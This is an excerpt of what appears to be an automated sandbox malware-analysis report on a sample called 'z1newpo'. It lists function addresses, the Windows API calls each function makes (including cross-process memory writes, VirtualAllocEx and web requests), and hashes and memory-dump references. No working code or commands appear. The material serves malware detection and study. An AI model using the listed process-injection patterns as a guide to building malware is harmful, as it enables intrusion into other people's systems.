                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                    • String ID:
                                                    • API String ID: 4247068974-0
                                                    • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                    • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                    • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                    • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                    Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )$U$\
                                                    • API String ID: 0-3705770531
                                                    • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                    • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                    • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                    • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                    Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                    • CoInitialize.OLE32(00000000), ref: 0046E505
                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                    • CoUninitialize.OLE32 ref: 0046E53D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                    • String ID: .lnk
                                                    • API String ID: 886957087-24824748
                                                    • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                    • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                    • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                    • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                    Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                    • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                    • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                    • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                    Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                    • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                    • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                    • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                    Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                    • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                    • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                    • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                    Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 708495834-557222456
                                                    • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                    • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                    • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                    • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                    Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                      • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                      • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                      • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                      • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                    • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                    • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                    • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                    • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                    Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \$]$h
                                                    • API String ID: 4104443479-3262404753
                                                    • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                    • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                    • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                    • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                    Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • CloseHandle.KERNEL32(?), ref: 00457E09
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                    • String ID: <$@
                                                    • API String ID: 2417854910-1426351568
                                                    • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                    • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                    • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                    • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                    Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3705125965-3916222277
                                                    • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                    • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                    • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                    • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                    Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                    • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                    • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem
                                                    • String ID: 0
                                                    • API String ID: 135850232-4108050209
                                                    • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                    • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                    • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                    • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                    Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                    • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                    • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                    • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                    Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                    • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                    • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: AU3_GetPluginDetails
                                                    • API String ID: 145871493-4132174516
                                                    • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                    • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                    • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                    • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                    Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                    • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                    • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                    • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                    Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                    Strings
